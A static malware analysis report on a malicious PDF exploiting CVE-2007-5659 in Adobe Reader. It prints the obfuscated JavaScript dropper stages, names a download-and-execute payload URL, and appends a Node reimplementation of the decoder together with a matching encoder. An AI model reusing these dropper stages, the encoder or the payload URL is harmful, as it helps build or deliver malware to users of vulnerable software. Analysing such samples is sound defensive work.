Malicious PDF — malware analysis report

Static analysis result for SHA-256 744927087c652217…

Verdict: MALICIOUS
File type: PDF
Size: 15.2 KB
MD5: ed37859a852e34d77ff2bb32788309c8
SHA-1: 0c0627e8fb8b0f0bf37a0fbf6bb501268f920667
SHA-256: 744927087c65221749693f1dc276f0fd51258e4408e1566f7a8b54c94d564b6e
Risk score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 Command and Scripting Interpreter: JavaScript

The PDF carries a multi-stage obfuscated JavaScript dropper. The first stage (javascript_obj0005_000.js) gates on app.plugIns.length, reads dash-separated hex data from the subject of the annotation at index 1 on page 0, decodes it with String.fromCharCode and hands the result to app.eval, with the method name built one character at a time. The hex-decoded layer (carved as legacy_pdfkit_stage_000.js) is a second custom decoder that unpacks the final stage; the final stage checks the Reader version against the APSB08-13 patch window and calls Collab.collectEmailInfo() to trigger CVE-2007-5659. Its shellcode carries the URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865Xbc177be6Y18b6d1feZ0100f060 as little-endian %uXXXX escapes for a download-and-execute of a second-stage payload, so that URL is the primary indicator for payload delivery.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: the entry JavaScript reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The CVE itself sits in the final decoded layer and is not visible in the first-stage script; for this sample it was recovered by static deobfuscation (see the Collab.collectEmailInfo finding above).
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865Xbc177be6Y18b6d1feZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: aff90214be71196597aec8e7bae84884530d3e332ed91e4a3b594bcf69782d8d
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x19A7
Size: 12133 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function uw8w_xxs(Xsyl5Qe_Fb, rQ_uYO_0wo__YTs) {
	var fT_L_ib = 20;
	var r00cD1 = 0;
	var p0_741_o = 512;
	var Q3K73_5 = fT_L_ib;
	var X__xufc_g = "";
	var lsp20b4qh = 4;
	var AD0a__n_8FbQ = this;
	var p_vo_R6_5 = "1234ee";
	var ig__nA = arguments;
	try {
		var EkP63c20WYk6 = 0;
		if (app) {
			Q3K73_5 = Q3K73_5 + 2;
			rQ_uYO_0wo__YTs = pr[EkP63c20WYk6].subject;
		}
		p_vo_R6_5 = p_vo_R6_5.replace(/\d+/, "call");
	} catch(e) { }
	Q3K73_5 = Q3K73_5 - fT_L_ib;
	var b_1_C2uc8X_6_0 = new Array();
	var vlVn_6_4F__W4d = 150;
	if (vlVn_6_4F__W4d > 0) {
		b_1_C2uc8X_6_0[0] = vlVn_6_4F__W4d;
		b_1_C2uc8X_6_0[1] = p0_741_o;
		b_1_C2uc8X_6_0[0] = b_1_C2uc8X_6_0[0] - vlVn_6_4F__W4d;
		b_1_C2uc8X_6_0[2] = b_1_C2uc8X_6_0[0];
		b_1_C2uc8X_6_0[1] = b_1_C2uc8X_6_0[1] - p0_741_o;
		b_1_C2uc8X_6_0[3] = b_1_C2uc8X_6_0[1];
	}
	if (Xsyl5Qe_Fb) { b_1_C2uc8X_6_0 = Xsyl5Qe_Fb; }
	if (!Xsyl5Qe_Fb) {
		var l47XXWW = ig__nA[p_vo_R6_5].toString();
		var Bf2eh5SV = 0;
		var Aq8_w_6 = Bf2eh5SV;
		vlVn_6_4F__W4d = vlVn_6_4F__W4d - 102;
		var WMO1__5_r__tx = 0;
		while (Aq8_w_6 < l47XXWW.length) {
			WMO1__5_r__tx = l47XXWW.charCodeAt(Aq8_w_6);
			if (WMO1__5_r__tx >= vlVn_6_4F__W4d && WMO1__5_r__tx <= 57) {
				if (Bf2eh5SV == lsp20b4qh) { Bf2eh5SV = -1; }
				if (Bf2eh5SV < 0) { Bf2eh5SV = 0; }
				b_1_C2uc8X_6_0[Bf2eh5SV] += WMO1__5_r__tx;
				if (b_1_C2uc8X_6_0[Bf2eh5SV] > p0_741_o) { b_1_C2uc8X_6_0[Bf2eh5SV] -= p0_741_o; }
				Bf2eh5SV = Bf2eh5SV + 1;
			}
			Aq8_w_6 = Aq8_w_6 + 1;
		}
	}
	var I_IV3gI04g = 0;
	var Lke_e6e = 0;
	var M_71wVn_5heBLy = -1;
	var kol_0v = 0;
	var pOjK8X20__4ud = 0;
	do {
		var YvABnv_8_6 = 256;
		if (b_1_C2uc8X_6_0[kol_0v] > YvABnv_8_6) { b_1_C2uc8X_6_0[kol_0v] -= YvABnv_8_6; }
		kol_0v = kol_0v + 1;
	} while (kol_0v < lsp20b4qh);
	kol_0v = kol_0v - lsp20b4qh;
	while (kol_0v < rQ_uYO_0wo__YTs.length) {
		var EAQ_JSd0 = rQ_uYO_0wo__YTs.substr(kol_0v, 1) + ' V V ';
		kol_0v = kol_0v + 1;
		var F0c6G_5_T_toFy = parseInt(EAQ_JSd0, fT_L_ib);
		if (M_71wVn_5heBLy != -1) {
			Lke_e6e += F0c6G_5_T_toFy;
			if (I_IV3gI04g == lsp20b4qh) { I_IV3gI04g = 0; }
			var hX1vST2rj_Pi8i = Lke_e6e;
			hX1vST2rj_Pi8i = hX1vST2rj_Pi8i - (pOjK8X20__4ud + 2) * b_1_C2uc8X_6_0[I_IV3gI04g];
			if (hX1vST2rj_Pi8i <= 0) { hX1vST2rj_Pi8i = hX1vST2rj_Pi8i - Math.floor(hX1vST2rj_Pi8i / 256) * 256; }
			hX1vST2rj_Pi8i = String.fromCharCode(hX1vST2rj_Pi8i);
			if (Q3K73_5 == 1) {
				X__xufc_g += F0c6G_5_T_toFy;
			} else if (Q3K73_5 == 2) {
				X__xufc_g += hX1vST2rj_Pi8i;
			} else {
				X__xufc_g += kol_0v;
				M_71wVn_5heBLy = -2;
			}
			M_71wVn_5heBLy = -1;
			I_IV3gI04g = I_IV3gI04g + 1;
			pOjK8X20__4ud = pOjK8X20__4ud + 1;
		} else if (M_71wVn_5heBLy == -1) {
			M_71wVn_5heBLy = fT_L_ib;
			Lke_e6e = F0c6G_5_T_toFy * fT_L_ib;
		}
	}
	var SiKNI8mr1_Pldpd = this;
	SiKNI8mr1_Pldpd['ev'+'al'](X__xufc_g);
}
uw8w_xxs(0, "
... (truncated)
Filename: deobfuscated.js
SHA-256: d232af3ad1cacef79098aa53d9c478c038ed70aa31e5d52111683266917d5afe
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 113820 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)
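The second-stage decoder in legacy_pdfkit_stage_000.js is worth reimplementing rather than emulating, because two of its behaviours are easy to miss: when `app` exists it ignores its string argument and decodes pr[0].subject (annotation 0's /Subj) in mode 2, and its four-element key is built from the ASCII digits of its own decompiled source (arguments.callee.toString(), with "1234ee" rewritten to "callee"), so renaming any digit-bearing identifier such as fT_L_ib or p0_741_o silently changes the key while pretty-printing does not. The script below is an added example, not part of this report or of the sample: a clean Node reimplementation of that key schedule and of the base-20 stream decode, plus an inverse used only to build constructed input. The stand-in decoder source and the plaintext in the demo are mine; for the real sample, pass the full text of uw8w_xxs as it appears in the artifact and the /Subj of annotation 0 as the payload.

```javascript
// Added example: stand-alone re-implementation of the uw8w_xxs() decoder
// (legacy_pdfkit_stage_000.js) for recovering its final layer outside
// Acrobat.  Assumes the decoder's "app present" mode (Q3K73_5 == 2).
const BASE20 = "0123456789abcdefghij";   // what parseInt(ch + ' V V ', 20) accepts

// Key schedule: walk the decoder's own source; every ASCII digit (code
// 48..57) is added into one of four accumulators, round-robin, reduced by
// 512 on overflow, then reduced once more by 256 (the trailing do/while).
// Only digits count, so whitespace changes are harmless; identifier
// renames that add or drop digits are not.
function deriveKey(funcSource) {
  const key = [0, 0, 0, 0];
  let slot = 0;
  for (const ch of funcSource) {
    const code = ch.charCodeAt(0);
    if (code >= 48 && code <= 57) {
      key[slot] += code;
      if (key[slot] > 512) key[slot] -= 512;
      slot = (slot + 1) % 4;
    }
  }
  return key.map((k) => (k > 256 ? k - 256 : k));
}

// Stream decode: two base-20 digits form a value 0..399; (n + 2) * key[n % 4]
// is subtracted for output position n; a non-positive result is reduced
// mod 256 with floor semantics, a positive one is taken as-is.
function decodeStage2(payload, key) {
  let out = "";
  let pending = -1;   // Lke_e6e: high digit * 20, waiting for the low digit
  let n = 0;          // pOjK8X20__4ud: output position
  for (const ch of payload) {
    const d = BASE20.indexOf(ch.toLowerCase());
    if (d < 0) throw new Error("not a base-20 digit: " + JSON.stringify(ch));
    if (pending < 0) { pending = d * 20; continue; }
    let h = pending + d - (n + 2) * key[n % 4];
    pending = -1;
    if (h <= 0) h -= Math.floor(h / 256) * 256;   // same as the sample's Math.floor step
    out += String.fromCharCode(h);
    n += 1;
  }
  return out;
}

// Inverse transform (not in the sample); only used to build constructed input.
// Works for byte-range characters, which is all a JS stage needs.
function encodeStage2(text, key) {
  let s = "";
  for (let n = 0; n < text.length; n++) {
    const b = text.charCodeAt(n);
    if (b > 255) throw new Error("byte-range characters only");
    const v = (b + (n + 2) * key[n % 4]) % 256;
    s += BASE20[Math.floor(v / 20)] + BASE20[v % 20];
  }
  return s;
}

function demoStage2() {
  // Constructed stand-in for the decoder source (only its digits matter).
  const source = "function f(a, b){var fT_L_ib = 20;var p0_741_o = 512;var lsp20b4qh = 4;}";
  const key = deriveKey(source);                       // [204, 147, 149, 156]
  const payload = encodeStage2('app.alert("constructed final stage");', key);
  return { key, payload, plaintext: decodeStage2(payload, key) };
}

console.log(demoStage2());
```

Because the key is position-dependent ((n + 2) multiplies it), a payload that decodes cleanly for its first few bytes and then turns to garbage almost always means a wrong key, i.e. the function text you supplied differs from the one the sample hashed; compare digit counts before suspecting the payload.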